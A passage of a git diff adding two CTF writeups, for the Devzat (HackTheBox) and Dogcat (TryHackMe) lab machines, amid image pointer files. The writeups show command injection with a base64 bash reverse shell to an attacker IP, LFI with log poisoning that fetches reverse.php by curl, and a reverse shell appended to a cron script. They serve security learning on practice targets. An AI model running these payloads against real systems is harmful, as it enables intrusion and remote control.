+size 35576
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp
new file mode 100644
index 0000000..73b93d6
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-21.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0a824527393c54a6c0805395d7777aef33ac7f918bf94b790aeb843b82c6e012
+size 26130
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-22.png b/content/writeup-ctf/writeup-devzat-htb/img/image-22.png
new file mode 100644
index 0000000..474eeb8
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-22.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0b247084c8c45ae8f71d733c7030532759ff8b56daf800f8ea47ab553db05fc7
+size 9860
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp
new file mode 100644
index 0000000..5694eb4
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-22.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0a0413d88641f2db9d8dd5bcf80222f6180cbf9012553701646bb1324f86931c
+size 6848
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-23.png b/content/writeup-ctf/writeup-devzat-htb/img/image-23.png
new file mode 100644
index 0000000..c837761
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-23.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:83ed834e79aa733ddf2317c01d03d6f7b7a7306e8ea64154d0526a11d0ca0033
+size 59786
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp
new file mode 100644
index 0000000..b7b550e
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-23.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f0ee133c38cf87a1e9dfe5695b8c932d12927e1d8c30c8d4c1aacf4162532f11
+size 43230
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-24.png b/content/writeup-ctf/writeup-devzat-htb/img/image-24.png
new file mode 100644
index 0000000..903539f
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-24.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f6cc84579e803eb28b1f9b69971174b0d20fddc242f0d3b62911cd0db1ee351e
+size 46238
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp
new file mode 100644
index 0000000..0b75384
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-24.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:907a08df1efd938e695d158e1d8113ca552c67b3babbad6d2cd0b407de81235c
+size 35912
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-25.png b/content/writeup-ctf/writeup-devzat-htb/img/image-25.png
new file mode 100644
index 0000000..323f91f
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-25.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fed1ef12432ae6a87ef7511adf9003ed331bf1e473f12472d4f74022d233448c
+size 87171
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp
new file mode 100644
index 0000000..f2f9069
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a8fce0da7edd3db130a961543135503a958c269b1c8c3678dc2ef0bb46ba6950
+size 54872
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-3.png b/content/writeup-ctf/writeup-devzat-htb/img/image-3.png
new file mode 100644
index 0000000..14b4141
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:399b6a6ed8b9e5951dca98674afcdde9030696c2ee564cf8b4dd7e4a361d5ca6
+size 31624
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp
new file mode 100644
index 0000000..da34d4a
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e597451e0f33cc0647f2e3d266721395ebc57058158de8e57320715b8e761e94
+size 29406
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-4.png b/content/writeup-ctf/writeup-devzat-htb/img/image-4.png
new file mode 100644
index 0000000..3eb814b
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4d017e9e387f25cc50461ff915ffd5b58d5c95a79014a5df3dc44381d47a6e49
+size 31756
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp
new file mode 100644
index 0000000..949b6e5
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:549ae04c6d83f21db0fcb9379a4911a393738140e18ad3288ba2b8a3ee669ab5
+size 55338
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-5.png b/content/writeup-ctf/writeup-devzat-htb/img/image-5.png
new file mode 100644
index 0000000..0e40623
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6af03fb670e13eb06015ea3bb8a545ac2be1feacd2eda8d0ac307e151bdc1266
+size 77999
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp
new file mode 100644
index 0000000..54d572a
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2af9ce1232d1033bf6daf626ac924c57e1e397254a77687b92d9fdcf6d620c5b
+size 53076
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-6.png b/content/writeup-ctf/writeup-devzat-htb/img/image-6.png
new file mode 100644
index 0000000..0c135e5
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0e03eb0bd2ba5533425ad285d029c60d523eb6fbe71f0ede1b9dc31617d8d5a2
+size 54091
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp
new file mode 100644
index 0000000..41ce839
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cff17375528b775737908e78f1afd8cc3b666073be1b52f2256c5e259360b641
+size 41722
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-7.png b/content/writeup-ctf/writeup-devzat-htb/img/image-7.png
new file mode 100644
index 0000000..11047ec
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6dcd8cc512f224751f0489954f74d168225f86699d954f50d4a8ae26e449899b
+size 97120
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp
new file mode 100644
index 0000000..555270f
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5a784eb3e3f336abe458c2e14769712f50dd6d0a5a89d6999c0b7efb84465283
+size 58324
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-8.png b/content/writeup-ctf/writeup-devzat-htb/img/image-8.png
new file mode 100644
index 0000000..2209e12
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5a6b48886942acdc19569caaad21a7d28f33e00e830035fc863d412fc24f7bea
+size 75020
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp
new file mode 100644
index 0000000..5f964f3
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1075d130b2afb91b26a69becb0791e2b3e60f42bda5ec76cc1c056c578de65f0
+size 54224
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-9.png b/content/writeup-ctf/writeup-devzat-htb/img/image-9.png
new file mode 100644
index 0000000..dde00c3
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6fd133f931d2d00d2031d7fb34508400d41b211d583542f7ba2f9391e486acfd
+size 7894
diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp
new file mode 100644
index 0000000..a2e00be
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c9c7113a4dbc290638d6ab88992721445a0576be7daae5b80ef8d5ce2f6f14cd
+size 6450
diff --git a/content/writeup-ctf/writeup-devzat-htb/index.md b/content/writeup-ctf/writeup-devzat-htb/index.md
new file mode 100644
index 0000000..a031604
--- /dev/null
+++ b/content/writeup-ctf/writeup-devzat-htb/index.md
@@ -0,0 +1,207 @@
+---
+title: "Writeup - Devzat (HTB)"
+date: 2022-03-15
+slug: "writeup-devzat-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Devzat](https://app.hackthebox.com/machines/Devzat) machine from  the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.118
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 8000/tcp : SSH
+
+I add the domain to the /etc/hosts file:
+
+
+```bash
+10.10.11.118	devzat.htb
+```
+I then access the site via a browser:
+
+![](img/image-2.webp)
+
+## Exploit
+
+After looking at the site I notice that a shell command is given as an example at the bottom of the page:
+
+
+```bash
+ssh -l [user_name] devzat.htb -p 8000
+```
+This command connects to the application hosted on port 8000.
+
+![](img/image-3.webp)
+
+This application is an interactive chat with a number of commands available:
+
+![](img/image-4.webp)
+
+Nothing particular for the moment. I make a directory scan on the site. For that I use "ffuf" with the wordlist [common.txt](http://ffuf.me/wordlists).
+
+
+```bash
+ffuf -c -u http://devzat.htb/FUZZ -w Documents/commun.txt
+```
+![](img/image-5.webp)
+
+Several folders but quite classic one. Now let's scan the subdomains:
+
+
+```bash
+ffuf -c -u http://devzat.htb -w Documents/sub.txt -H "Host: FUZZ.devzat.htb" -fw 18
+```
+![](img/image-6.webp)
+
+A subdomain is found ! I add it in the /etc/hosts file then I go to the site :
+
+![](img/image-7.webp)
+
+It is a web page with a formulary to add pets. Now let's scan the folders for this subdomain.
+
+![](img/image-8.webp)
+
+This is a git project with a number of files.
+
+![](img/image-9.webp)
+
+I will download the projects with the following command:
+
+
+```bash
+wget -r -np -R "index.html*" http://pets.devzat.htb/.git
+```
+I first check the last commit to see if any files have been modified or deleted:
+
+![](img/image-10.webp)
+
+And indeed a large number of files have been deleted, so I will restore the last commit with the following command:
+
+
+```bash
+git checkout -- .
+```
+![](img/image-11.webp)
+
+Now that we have the complete tree, let's start the code analysis. Let's start with main.go.
+
+I find in this file, a function related to the loading of the character of the pet animal. This function takes as argument the species. It then executes a "sh" command which retrieves the content of one of the files contained in the "characteristics" folder. We will be able to use this function to execute some code.
+
+![](img/image-12.webp)
+
+For that I make a classic request that I intersperse with Burp.
+
+![](img/image-13.webp)
+
+Then I modify the value of "species" to insert my code. I test at first a classical reverse shell, but without success.
+
+![](img/image-14.webp)
+
+Let's try to convert our command to Base64 to ensure that there is no modification before execution on the target machine.
+
+[Reverse Shells - Pentest Book](https://pentestbook.six2dez.com/exploitation/reverse-shells)
+
+For that I use the following command to encode my reverse shell command in base64.
+
+
+```bash
+echo "bash -i >& /dev/tcp/10.10.16.2/1234 0>&1" | base64
+```
+Then I transmit the following order in the form.
+
+
+```bash
+echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMQo=' | base64 -d | bash
+```
+Bingo, I am now connected as Patrick.
+
+![](img/image-15.webp)
+
+No change it's not this user who has the first flag. I will have to find a way to change the user. To start, I'll run the [linPeas](http://linpeas.sh) script to get an overview of the machine.
+
+The first thing that catches my attention is the number of open ports.
+
+![](img/image-16.webp)
+
+Indeed there are a number of ports open only locally on the machine. So I will do an ssh port forwarding.
+
+
+```bash
+ssh -L 8086:127.0.0.1:8086 -N patrick@10.10.11.118
+```
+I can then perform an nmap scan on my local address to identify the service running on port 8086.
+
+![](img/image-17.webp)
+
+It is the InfluxDB service in version 1.7.5 that runs on this port. Let's look for an exploit...
+
+After some research I found the CVE-2019-20933. It is an exploit that allows to get an admin access to the database without using a password. I use the following script:
+
+{{< github repo="LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933" >}}
+
+I will now be able to search for information in the different databases. At first I look for the registered users :
+
+![](img/image-19.webp)
+
+I find the user "catherine" with her password. This is a very good news, indeed it is her who has the first flag.
+
+![](img/image-20.webp)
+
+I connect with ssh, then I get the flag.
+
+## Privilege escalation
+
+In the linPeas scan result I also noticed that a "devchat" service was running with patrick rights. It looks like a test version running on port 8443 in parallel with the production version.
+
+
+```bash
+catherine@devzat:~/dev/dev$ ps aux | grep dev
+[...]
+patrick	839	0.0	0.5	1085916	11904	?	Sl	12:28	0:00	./devchat
+[...]
+```
+I also found backup files related to this same service:
+
+![](img/image-21.webp)
+
+These are files belonging to catherine, good news I will be able to recover them and analyze them to find an exploit.
+
+In the file "commands.go", I quickly find that the command /file uses a password to work. And this password is clearly indicated.
+
+![](img/image-22.webp)
+
+Ok let's try the different things we discovered.
+
+I log back in as patrick, then start a local SSH session on 8443.
+
+![](img/image-23.webp)
+
+Let's try to read a root file with the command /file and with the password found previously. I test with the file id\_rsa of the user root.
+
+![](img/image-24.webp)
+
+It works! So now I can connect as root with ssh. Then get the last flag.
+
+![](img/image-25.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave .git accessible on a website
+- Do not use shell commands in functions used by forms accessible on a web site
+- Do not store non-hasher passwords in a database
+- Update InfluxDB
+- Do not run the chat bot with root privileges
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png
new file mode 100644
index 0000000..c995304
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c537e42185f47b0030de10d9a4e55d61ed17a9f3183748cd9a7929e3fffaa729
+size 36714
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp
new file mode 100644
index 0000000..7010d0d
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bd2f41ce8a5db7c98db516e42cc459943190b2211853b404b6330fa0d692238d
+size 35514
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png
new file mode 100644
index 0000000..5ad0a48
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cb6aff75e49f9b6ea869b9b268c822957a870918ec8e5c5953c49e9a6b71c0f2
+size 23289
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp
new file mode 100644
index 0000000..b66e290
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b79dc9c19e3a2bcab18fad644001c3409f8d583f985ea08c917624fe2c76816f
+size 9824
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png
new file mode 100644
index 0000000..5576df5
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ba66ebd4cb439e8c4955d7ba9f95243fe9fa2920c732dff1839e4c189209203a
+size 80165
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp
new file mode 100644
index 0000000..ffec38e
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8b51c72dd0451545949d7b0121ecc3e8153e97c675fe6dc5c0eaafe2e45402d9
+size 74100
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png
new file mode 100644
index 0000000..99d654d
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0d03f3b22b5a3cb01aa64b3ac87ed16b3d4b52fa4fcd264e76d9404c3357772a
+size 23323
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp
new file mode 100644
index 0000000..9d01c0f
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b47d8191354140344becc1626a2ce0a20c732c817173718c70b9bc5f24118300
+size 27870
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png
new file mode 100644
index 0000000..f12961a
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bc129cd34f622d63efc12c8f31d111b083fd2ce698f6bf9321fa266b01c24229
+size 41689
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp
new file mode 100644
index 0000000..2c1ae7a
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2078f2d76ba091430f4ec8e2fe6a0dbb82b6c71df4aa3c89976e52479f939f29
+size 36090
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png
new file mode 100644
index 0000000..72935ff
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:602120665ac19e728ba032a0299e8204bae06908ab50c936e1600984270c1767
+size 15887
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp
new file mode 100644
index 0000000..869d321
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:785b31948744b4e4910114c1b3766249092b365bae26aa503813803957c2264c
+size 15034
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png
new file mode 100644
index 0000000..3df38d0
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7705333e8bff8b3e09b5921690a95aa71847809b1520b7a6da53bf0cf175d4c8
+size 3561
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp
new file mode 100644
index 0000000..5e4784a
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:dee0258433c1946f75ea17a024ced6b27a243ebac4911ad9e23ffb1dac49e2a0
+size 3924
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png
new file mode 100644
index 0000000..a8bcc06
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:974e0be2e0f951c88474f6cd13b9f0c5bd4b8544322438ee264f2bb1d45c7991
+size 14703
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp
new file mode 100644
index 0000000..c2f61e0
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5d4f8ba6a97c92572673e9862cc691c6e1bb5873789d4de1c42bfb45a699a1fd
+size 12934
diff --git a/content/writeup-ctf/writeup-dogcat-thm/index.md b/content/writeup-ctf/writeup-dogcat-thm/index.md
new file mode 100644
index 0000000..c9b1202
--- /dev/null
+++ b/content/writeup-ctf/writeup-dogcat-thm/index.md
@@ -0,0 +1,194 @@
+---
+title: "Writeup - Dogcat (THM)"
+date: 2022-05-31
+slug: "writeup-dogcat-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Dogcat](https://tryhackme.com/room/dogcat) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (Apache 2.4.38)
+
+![](img/image-2.webp)
+
+## Exploit
+
+In a first step I start by making a scan of the website folders:
+
+![](img/image-3.webp)
+
+We find a page `cat.php`, it is surely the page which provides the random images of cat. With a little deduction I find a similar page: `dog.php`.
+
+I notice the use of an argument when I click on one of the buttons. So I try a Local-Remote File Inclusion, but without success. An error tells us that the options are: `dog` & `cat`.
+
+After some research I find the following page: [PHP Base64 Filter](https://blog.clever-age.com/fr/2014/10/21/owasp-local-remote-file-inclusion-lfi-rfi/). These are techniques to bypass security checks for Local-Remote File Inclusion. I try the version using a PHP filter:
+
+
+```bash
+http://10.10.91.89/?view=php://filter/read=convert.base64-encode/resource=cat/../index
+```
+I get the contents of the index file encoded in base64 :
+
+
+```bash
+<!DOCTYPE HTML>
+<html>
+
+<head>
+    <title>dogcat</title>
+    <link rel="stylesheet" type="text/css" href="/style.css">
+</head>
+
+<body>
+    <h1>dogcat</h1>
+    <i>a gallery of various dogs or cats</i>
+
+    <div>
+        <h2>What would you like to see?</h2>
+        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
+        <?php
+            function containsStr($str, $substr) {
+                return strpos($str, $substr) !== false;
+            }
+            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
+            if(isset($_GET['view'])) {
+                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
+                    echo 'Here you go!';
+                    include $_GET['view'] . $ext;
+                } else {
+                    echo 'Sorry, only dogs or cats are allowed.';
+                }
+            }
+        ?>
+    </div>
+</body>
+
+</html>
+```
+I can also use the same principle to get the content of the `flag.php` flag.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d
+<?php
+$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
+?>
+```
+Pour faire une injection de commande //TODO
+
+![](img/image-4.webp)
+
+
+```bash
+[11/May/2022:12:26:50 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=cat/../../../../etc/passwd&ext&test=id HTTP/1.1" 400 0 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data) "
+```
+
+```bash
+http://10.10.91.89/?view=php://filter/resource=cat/../../../../../var/log/apache2/access.log&ext&test=curl%2010.8.3.186:80/reverse.php%20%3E%20reverse.php
+```
+![](img/image-5.webp)
+
+I now have a reverse shell as `www-data`.
+
+
+```bash
+$ cd /var/www
+$ ls
+flag2_QMW7JvaY2LvK.txt
+html
+$ cat flag2_QMW7JvaY2LvK.txt
+THM{LF1_t0_RC3_aec3fb}
+```
+I can get the second flag.
+
+## Privilege escalation
+
+I start by checking the sudo permissions of my user :
+
+![](img/image-6.webp)
+
+I have the permission to run the `env` command as `root`. So I look on GTFObin to see if there is a possibility to launch a shell with this command: [env sudo](https://gtfobins.github.io/gtfobins/env/#sudo).
+
+With the following command I create a `root` shell.
+
+![](img/image-7.webp)
+
+
+```bash
+cd /root
+ls
+flag3.txt
+cat flag3.txt
+THM{D1ff3r3nt_3nv1ronments_874112}
+```
+I can get the third flag. After some research I notice a `dockerenv` file. So we are in a docker and I will have to find a way to get out to get the last flag.
+
+
+```bash
+ls -la
+total 80
+drwxr-xr-x   1 root root 4096 May 11 11:59 .
+drwxr-xr-x   1 root root 4096 May 11 11:59 ..
+-rwxr-xr-x   1 root root    0 May 11 11:59 .dockerenv
+drwxr-xr-x   1 root root 4096 Feb 26  2020 bin
+drwxr-xr-x   2 root root 4096 Feb  1  2020 boot
+drwxr-xr-x   5 root root  340 May 11 11:59 dev
+drwxr-xr-x   1 root root 4096 May 11 11:59 etc
+drwxr-xr-x   2 root root 4096 Feb  1  2020 home
+drwxr-xr-x   1 root root 4096 Feb 26  2020 lib
+drwxr-xr-x   2 root root 4096 Feb 24  2020 lib64
+drwxr-xr-x   2 root root 4096 Feb 24  2020 media
+drwxr-xr-x   2 root root 4096 Feb 24  2020 mnt
+drwxr-xr-x   1 root root 4096 May 11 11:59 opt
+dr-xr-xr-x 112 root root    0 May 11 11:59 proc
+drwx------   1 root root 4096 Mar 10  2020 root
+drwxr-xr-x   1 root root 4096 Feb 26  2020 run
+drwxr-xr-x   1 root root 4096 Feb 26  2020 sbin
+drwxr-xr-x   2 root root 4096 Feb 24  2020 srv
+dr-xr-xr-x  13 root root    0 May 11 11:59 sys
+drwxrwxrwt   1 root root 4096 Mar 10  2020 tmp
+drwxr-xr-x   1 root root 4096 Feb 24  2020 usr
+drwxr-xr-x   1 root root 4096 Feb 26  2020 var
+ls /otp
+ls: cannot access '/otp': No such file or directory
+ls /opt
+backups
+```
+In the `/opt` folder I find a `backups` file with the following content:
+
+
+```bash
+#!/bin/bash
+tar cf /root/container/backup/backup.tar /root/container
+```
+backup.shIt is most certainly a script that runs regularly with a CRON job. Knowing that I can write to the file, I add the following line:
+
+
+```bash
+echo "bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> backup.sh
+```
+After a few seconds, I have a reverse shell as root but on the machine and not in a docker.
+
+![](img/image-8.webp)
+
+I can now recover the last flag.
+
+
+```bash
+# cat /root/flag4.txt
+THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
+```
diff --git a/content/writeup-ctf/writeup-goodgames-htb/featured.png b/content/writeup-ctf/writeup-goodgames-htb/featured.png
new file mode 100644
index 0000000..c8a79fd
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:93ad7743716d5a2111781d1693ed8dba44bcbf87c9dfcd21e3129812996f8898
+size 216815
diff --git a/content/writeup-ctf/writeup-goodgames-htb/featured.webp b/content/writeup-ctf/writeup-goodgames-htb/featured.webp
new file mode 100644
index 0000000..ead7b47
--- /dev/null
+++ b/content/writeup-ctf/writeup-goodgames-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9ecf6bb749e53274e4278deab7c934b40b46c02a13b2893c2a6571e89dbfaff3
+size 23672
diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png
new file mode 100644
index 0000000..bba9c09
--- /dev/null
